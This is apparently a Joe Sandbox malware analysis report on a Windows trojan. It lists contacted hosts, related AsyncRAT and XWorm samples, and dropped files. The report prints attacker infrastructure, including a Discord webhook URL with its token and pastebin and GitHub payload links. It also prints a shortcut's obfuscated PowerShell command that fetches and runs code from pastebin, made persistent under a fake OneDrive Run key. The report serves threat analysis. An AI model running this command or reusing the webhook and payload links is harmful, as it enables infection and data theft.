                      https://pastebin.com/raw/sA04Mwk2false
                        		unknown
                        http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm3.txtfalse
                          		unknown
                          https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2true
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://discord.compowershell.exe, 0000000D.00000002.2693402019.000002059FC1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764790986.000001276301F000.00000004.00000800.00020000.00000000.sdmptrue
                              		unknown
                              https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_powershell.exe, 00000012.00000002.2764790986.0000012762742000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764790986.0000012762702000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764790986.0000012762734000.00000004.00000800.00020000.00000000.sdmptrue
                                		unknown
                                https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQpowershell.exe, 0000000D.00000002.2693402019.000002059F2FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764790986.0000012762742000.00000004.00000800.00020000.00000000.sdmptrue
                                  		unknown
                                  https://go.micropowershell.exe, 0000000D.00000002.2693402019.000002059EC7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764790986.0000012762078000.00000004.00000800.00020000.00000000.sdmptrue
                                  • URL Reputation: safe
                                  		unknown
                                  http://crl.ver)svchost.exe, 00000007.00000002.3431175834.000001F169ACD000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000007.00000003.2331876949.000001F16F200000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://discord.compowershell.exe, 0000000D.00000002.2693402019.000002059FC1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764790986.000001276301F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://g.live.com/odclientsettings/Prod/C:edb.log.7.drfalse
                                        		unknown
                                        https://discord.com/api/webhooks/128545359042878powershell.exe, 0000000D.00000002.2693402019.000002059FC1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764790986.000001276301F000.00000004.00000800.00020000.00000000.sdmptrue
                                          		unknown
                                          https://raw.githubusercontent.compowershell.exe, 0000000D.00000002.2693402019.000002059F29A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764790986.0000012762694000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://raw.githubusercontent.compowershell.exe, 0000000D.00000002.2693402019.000002059F26B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2693402019.000002059F29A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764790986.0000012762694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764790986.0000012762665000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://aka.ms/pscore68powershell.exe, 0000000D.00000002.2693402019.000002059E7D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2693402019.000002059E794000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764790986.0000012761BB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764790986.0000012761BCE000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000D.00000002.2693402019.000002059E771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764790986.0000012761BB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://pastebin.compowershell.exe, 0000000D.00000002.2693402019.000002059F1D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2693402019.000002059EC7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2693402019.000002059F1EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764790986.00000127625CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764790986.00000127625E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764790986.0000012762078000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://pastebin.compowershell.exe, 0000000D.00000002.2693402019.000002059F1DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764790986.00000127625D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://discord.comP.powershell.exe, 00000012.00000002.2764790986.000001276301F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    162.159.138.232
                                                    		discord.comUnited States
                                                    		13335CLOUDFLARENETUStrue
                                                    172.67.19.24
                                                    		pastebin.comUnited States
                                                    		13335CLOUDFLARENETUStrue
                                                    185.199.110.133
                                                    		raw.githubusercontent.comNetherlands
                                                    		54113FASTLYUStrue

                                                    Private

                                                    IP
                                                    127.0.0.1

                                                    General Information

                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1534110
                                                    Start date and time:2024-10-15 15:58:48 +02:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 6m 33s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:19
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:xK44OOt7vD.exe
                                                    renamed because original name is a hash value
                                                    Original Sample Name:1e4a2d67df3b0a1f2d1f5d3af6587f9f222adf40c0a9d4976fc78a21d9efa5b5.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.expl.evad.winEXE@25/25@3/4
                                                    EGA Information:
                                                    • Successful, ratio: 66.7%
                                                    HCA Information:
                                                    • Successful, ratio: 85%
                                                    • Number of executed functions: 31
                                                    • Number of non-executed functions: 43
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                    • Excluded IPs from analysis (whitelisted): 40.126.32.76, 40.126.32.72, 40.126.32.74, 40.126.32.133, 20.190.160.17, 40.126.32.138, 40.126.32.134, 20.190.160.20, 184.28.90.27
                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                    • Execution Graph export aborted for target powershell.exe, PID 3136 because it is empty
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    • VT rate limit hit for: xK44OOt7vD.exe

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    09:59:59API Interceptor422x Sleep call for process: powershell.exe modified
                                                    10:00:08API Interceptor2x Sleep call for process: svchost.exe modified
                                                    16:00:13AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                    16:00:21AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    162.159.138.232Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                      cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                        OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                          steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                            cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                              SecuriteInfo.com.Win64.MalwareX-gen.20317.810.exeGet hashmaliciousUnknownBrowse
                                                                SecuriteInfo.com.Python.Muldrop.18.50.31694.exeGet hashmaliciousBlank GrabberBrowse
                                                                  Exela(1).exeGet hashmaliciousExela Stealer, Python StealerBrowse
                                                                    SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dllGet hashmaliciousAsyncRAT, XWormBrowse
                                                                      http://relay.csgoze520.com/Get hashmaliciousUnknownBrowse
                                                                        172.67.19.24cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                        • pastebin.com/raw/sA04Mwk2
                                                                        BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                        • pastebin.com/raw/sA04Mwk2
                                                                        cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                        • pastebin.com/raw/sA04Mwk2
                                                                        steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                        • pastebin.com/raw/sA04Mwk2
                                                                        cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                        • pastebin.com/raw/sA04Mwk2
                                                                        envifa.vbsGet hashmaliciousUnknownBrowse
                                                                        • pastebin.com/raw/V9y5Q5vv
                                                                        sostener.vbsGet hashmaliciousRemcosBrowse
                                                                        • pastebin.com/raw/V9y5Q5vv
                                                                        Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                                                                        • pastebin.com/raw/NsQ5qTHr
                                                                        Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                                                                        • pastebin.com/raw/NsQ5qTHr
                                                                        Dadebehring PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                                                                        • pastebin.com/raw/NsQ5qTHr

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        discord.comLm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                                        • 162.159.138.232
                                                                        cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                        • 162.159.138.232
                                                                        OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                        • 162.159.138.232
                                                                        BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                        • 162.159.137.232
                                                                        gaber.ps1Get hashmaliciousUnknownBrowse
                                                                        • 162.159.137.232
                                                                        cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                        • 162.159.135.232
                                                                        steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                        • 162.159.138.232
                                                                        cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                        • 162.159.138.232
                                                                        Q1KaSJ8Fom.exeGet hashmaliciousUnknownBrowse
                                                                        • 162.159.135.232
                                                                        Q1KaSJ8Fom.exeGet hashmaliciousUnknownBrowse
                                                                        • 162.159.136.232
                                                                        pastebin.comLm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                                        • 104.20.3.235
                                                                        gaber_pyld.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                        • 172.67.19.24
                                                                        cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                        • 172.67.19.24
                                                                        OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                        • 104.20.4.235
                                                                        BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                        • 104.20.3.235
                                                                        gaber.ps1Get hashmaliciousUnknownBrowse
                                                                        • 104.20.4.235
                                                                        cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                        • 104.20.4.235
                                                                        steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                        • 172.67.19.24
                                                                        cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                        • 172.67.19.24
                                                                        xc.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                        • 172.67.19.24
                                                                        raw.githubusercontent.comLm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                                        • 185.199.111.133
                                                                        cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                        • 185.199.111.133
                                                                        OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                        • 185.199.109.133
                                                                        BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                        • 185.199.111.133
                                                                        gaber.ps1Get hashmaliciousUnknownBrowse
                                                                        • 185.199.108.133
                                                                        cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                        • 185.199.110.133
                                                                        steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                        • 185.199.109.133
                                                                        cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                        • 185.199.108.133
                                                                        na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                        • 185.199.109.133
                                                                        na.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                        • 185.199.108.133

                                                                        ASNs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        CLOUDFLARENETUSLm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                                        • 162.159.138.232
                                                                        gaber_pyld.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                        • 172.67.19.24
                                                                        cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                        • 162.159.138.232
                                                                        OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                        • 162.159.138.232
                                                                        BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                        • 104.18.111.161
                                                                        gaber.ps1Get hashmaliciousUnknownBrowse
                                                                        • 162.159.137.232
                                                                        cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                        • 162.159.135.232
                                                                        steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                        • 162.159.138.232
                                                                        cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                        • 162.159.138.232
                                                                        HqvlYZC7Gf.exeGet hashmaliciousUnknownBrowse
                                                                        • 104.27.206.92
                                                                        CLOUDFLARENETUSLm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                                        • 162.159.138.232
                                                                        gaber_pyld.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                        • 172.67.19.24
                                                                        cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                        • 162.159.138.232
                                                                        OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                        • 162.159.138.232
                                                                        BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                        • 104.18.111.161
                                                                        gaber.ps1Get hashmaliciousUnknownBrowse
                                                                        • 162.159.137.232
                                                                        cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                        • 162.159.135.232
                                                                        steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                        • 162.159.138.232
                                                                        cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                        • 162.159.138.232
                                                                        HqvlYZC7Gf.exeGet hashmaliciousUnknownBrowse
                                                                        • 104.27.206.92

                                                                        JA3 Fingerprints

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        3b5074b1b5d032e5620f69f9f700ff0eLm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                                        • 162.159.138.232
                                                                        • 172.67.19.24
                                                                        • 185.199.110.133
                                                                        gaber_pyld.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                        • 162.159.138.232
                                                                        • 172.67.19.24
                                                                        • 185.199.110.133
                                                                        cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                        • 162.159.138.232
                                                                        • 172.67.19.24
                                                                        • 185.199.110.133
                                                                        OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                        • 162.159.138.232
                                                                        • 172.67.19.24
                                                                        • 185.199.110.133
                                                                        BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                        • 162.159.138.232
                                                                        • 172.67.19.24
                                                                        • 185.199.110.133
                                                                        gaber.ps1Get hashmaliciousUnknownBrowse
                                                                        • 162.159.138.232
                                                                        • 172.67.19.24
                                                                        • 185.199.110.133
                                                                        cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                        • 162.159.138.232
                                                                        • 172.67.19.24
                                                                        • 185.199.110.133
                                                                        steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                        • 162.159.138.232
                                                                        • 172.67.19.24
                                                                        • 185.199.110.133
                                                                        cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                        • 162.159.138.232
                                                                        • 172.67.19.24
                                                                        • 185.199.110.133
                                                                        https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                        • 162.159.138.232
                                                                        • 172.67.19.24
                                                                        • 185.199.110.133

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Archive, ctime=Sat May 7 04:20:03 2022, mtime=Mon Sep 9 22:58:05 2024, atime=Sat May 7 04:20:03 2022, length=69632, window=hidenormalshowminimized
                                                                        Category:dropped
                                                                        Size (bytes):1728
                                                                        Entropy (8bit):4.527272298423835
                                                                        Encrypted:false
                                                                        SSDEEP:24:8MBsCCbRKrzcAJBkr+/4MsPsiqxlD2uxmCnBuG4aVlilzXQaR3+hab/Ia7/OB+/q:8zD6JUUPx2uxFu+LozXv3KabINBY0
                                                                        MD5:724AA21828AD912CB466E3B0A79F478B
                                                                        SHA1:41B80A72CE8C2F1F54C1E595872D7ECD63D637CD
                                                                        SHA-256:D675147502CF2CA50BC4EC9A0D95DED0A5A8861BEC3D24FCD9EDD3F4B5718E70
                                                                        SHA-512:B88218356ABF805B4263B0960DC6D0FBEC47E2135FA74839449CA860F727D54A1014062C9E7DB0652E81C635C8C0C177B47326DADAF3AE34ED058FA085F1E98C
                                                                        Malicious:true
                                                                        Preview:L..................F.... ...|%h..a.........|%h..a..........................E....P.O. .:i.....+00.../C:\...................V.1......Y..0.Windows.@......T,*)Y................................W.i.n.d.o.w.s.....Z.1.....$Yh...System32..B......T,*)Y......L_.....................!.S.y.s.t.e.m.3.2.....f.2......T.* .forfiles.exe..J......T.*)Y.....A...........t..........t..f.o.r.f.i.l.e.s...e.x.e.......V...............4.......U...........`8......Windows.C:\Windows\System32\forfiles.exe..&.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.f.o.r.f.i.l.e.s...e.x.e.../.p. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2. ./.m. .n.o.t.e.p.a.d...e.x.e. ./.c. .".p.o.w.e.r.s.h.e.l.l...e.x.e. .-.c.o.m.m.a.n.d. .p.o.w.e.r.s.h.e.l.l. .-.w.i.n.d.o.w.s.t.y.l.e. .h. .-.c.o.m.m.a.n.d. .'.s.a.l. .f.a.t.b.a.k.e. .c.a.l.c.;.s.a.l. .c.a.l.l.i.t. .i.E.x.;. .s.a.l. .$.e.n.v.:.o.s. .i.W.r.;. .c.a.l.l.i.T.(.W.I.N.D.O.W.S._.N.T. .p.a.s.t.e.b.i.n...c.o.m./.r.a.w./.s.A.0.4.M.w.k.2. .-.u.s.e.b.a.s.i.c.p.a.r.s.i.n.g.).'."..

                                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):1310720
                                                                        Entropy (8bit):0.8307072195312541
                                                                        Encrypted:false
                                                                        SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugL:gJjJGtpTq2yv1AuNZRY3diu8iBVqFx
                                                                        MD5:5DA1B6AE070D9552DCB26ED79F797ECA
                                                                        SHA1:920962E648803769B5719727EB6A887DED62B8BC
                                                                        SHA-256:29BF28633C3CA74BE8796DA69EAAD86AD767AA803D3BA278801DB0C7E26AE7B3
                                                                        SHA-512:20BB62D2141F996D8F9405B2E71ABB3B26F65E9B012E06964C20628DE92E90C400E79C78311DB9C39C19C567176D45F62FCD8466AD436F5CF59184F570644EDF
                                                                        Malicious:false
                                                                        Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x1fcf6db7, page size 16384, DirtyShutdown, Windows version 10.0
                                                                        Category:dropped
                                                                        Size (bytes):1310720
                                                                        Entropy (8bit):0.6585472132629809
                                                                        Encrypted:false
                                                                        SSDEEP:1536:hSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:haza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                        MD5:D610996352C9D64CFE81956E7464DC42
                                                                        SHA1:2F03F8BA5E3308B7570777560BB91927B46E2B49
                                                                        SHA-256:61F355F5CD5BA51ECA9B47FBE4CC68AFF5019BB5AA074A5344DCB9590EFE6B2F
                                                                        SHA-512:190326994611F65649607B9CA95AA35D933307A16BD7F0494B3F57AA135DF5CC9F0CF1544840F2919C00A808C7258D27935152D3E0B8F89AAD36D40F99CE92C3
                                                                        Malicious:false
                                                                        Preview:..m.... ...............X\...;...{......................0.z..........{.......|M.h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{..........................................|...................9......|...........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):16384
                                                                        Entropy (8bit):0.07925452414577644
                                                                        Encrypted:false
                                                                        SSDEEP:3:nQtyYeaO4wkbGuAJkhvekl1ccTOZil/illrekGltll/SPj:nQUzT4PbrxlOwO4leJe3l
                                                                        MD5:AE318FC6341840F14AE11F0D5CC797D6
                                                                        SHA1:72CFC2BFB6153B297721B0D6F5D6456C451A2FF3
                                                                        SHA-256:51119C91532575EA3B4B7759178E22F6F5A304B1B6077414540E724F9113272F
                                                                        SHA-512:F5B91F2E91789F7D8C1A33CF304DA594EFF535FBF89B082CB5A6B4F5B1AD449A2D697D6797D84F7413DA3E9B20F1EAA8838BEBFEDB8656F45D43531C9863DBC7
                                                                        Malicious:false
                                                                        Preview:?R.$.....................................;...{.......|.......{...............{.......{...XL......{...................9......|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):11608
                                                                        Entropy (8bit):4.890472898059848
                                                                        Encrypted:false
                                                                        SSDEEP:192:x9smzdcU6Cj9dcU6C7Vsm5emdV9smbib4xYTVsm5emdqxoe5gpOWib47VFn3eGOq:XFfib4xYTfHib47VoGIpN6KQkj2gikjm
                                                                        MD5:41B6EF8F5BDCA3771F6F993AB58D876A
                                                                        SHA1:F34B45B49FAA56534920AA42790BFEC7A32D63CD
                                                                        SHA-256:C01C9014DAF042A0080FCABE404337D5EFF6305F0F8BF6E96CE96818A620B9E9
                                                                        SHA-512:26A40B64312CF7E13136BDACF069D0F53D88ACCC5B61839F92D80684E57C18B2EE0BB458BDABD289304B4CD04DC067D55B7FDB802D9D2BA8A46C3FFDCF66C137
                                                                        Malicious:false
                                                                        Preview:PSMODULECACHE......&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope........-Z..z..a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package........Find-Package........Install-PackageProvider........Import-PackageProvider........Get-PackageProvider........Register-PackageSource........Uninstall-Package........Find-PackageProvider........p...z..[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):64
                                                                        Entropy (8bit):1.1940658735648508
                                                                        Encrypted:false
                                                                        SSDEEP:3:Nlllul8lXlZ:NllU0
                                                                        MD5:83EAEDDD61556ED327263BD12B2998C2
                                                                        SHA1:BFEAA70BBF4074F5BD594222178903E1CEF05C61
                                                                        SHA-256:DED87FAA166E0D5F0C1B33739F29BFB5E0517F98D20222F8D8EB31A2ED4D5543
                                                                        SHA-512:6FF4BE72145B4F57CF3A2D582BB3C34B0A1101EAA8A7F58C4D0204DF70F726A60C5D72959D3199C74FB113CB3BBE35DEBA1041EA0767B2B669BB0B8398D37FB1
                                                                        Malicious:false
                                                                        Preview:@...e...............................R..".............@..........

                                                                        C:\Users\user\AppData\Local\Temp\Backend.dll

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):31744
                                                                        Entropy (8bit):5.733195715654648
                                                                        Encrypted:false
                                                                        SSDEEP:384:d+NjrSvLsSPa/1ZX3ohNQGDYOMg3P2SFZ2W1whvMDNGeSeu6dt3YXvu6:cpSvLQbOMgOSuQwRMRGe3deXvu6
                                                                        MD5:228092BB00D909AEE1F694A26074CB57
                                                                        SHA1:E409B75364693456006CADF61F2A5DDEF311ED0E
                                                                        SHA-256:05FF6FB5A27E37AAB0269106830A0E1A56C709428AB130BBDDEFF737452E6FE3
                                                                        SHA-512:3B714852BEB607C1EE394613E5974131CE7617C8E34E808F81DF4382ADC62CD61A81A0CFBA5019F9D40A8F38171A4E1FD75137529CEE4896FD10F55912E23E3C
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
